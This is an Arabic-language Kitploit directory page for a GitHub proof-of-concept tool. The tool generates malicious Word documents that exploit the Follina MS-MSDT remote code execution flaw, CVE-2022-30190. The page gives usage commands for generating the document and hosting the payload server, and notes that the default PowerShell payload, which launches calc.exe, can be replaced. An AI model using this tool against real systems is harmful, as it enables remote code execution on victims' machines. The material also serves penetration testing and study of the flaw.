Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-30190 — مولّد وثيقة PoC لـ MS-MSDT Follina CVE-2022-30190 | Kitploit
أدوات/GitHubGitHub/sudoaza/cve-2022-30190
توليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubsudoaza/cve-2022-30190

CVE-2022-30190

مولّد وثيقة PoC لـ MS-MSDT Follina CVE-2022-30190

عرض المستودع
72منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

MS-MSDT Follina CVE-2022-30190 PoC

مولد مستند docx خبيث لاستغلال ثغرة (تنفيذ تعليمات برمجية عن بعد في Microsoft Office Word)

تم إنشاء هذا السكريبت بناءً على CVE-2021-40444 PoC by LockedByte و شرح من Tothi

الاستخدام

أولاً، قم بتعديل backup.html واستبدل حمولة PowerShell. في الوقت الحالي، يقوم فقط بتشغيل calc.exe باستخدام IEX('calc.exe').

python3 exploit.py generate http://<SRV IP>

Document generation

بمجرد توليد مستند docx الخبيث (سيكون في out/)، يمكنك إعداد الخادم:

sudo python3 exploit.py host 80

Server

أخيرًا، جرب مستند docx في جهاز افتراضي يعمل بنظام Windows:

Pop Calc

تنزيل الأداة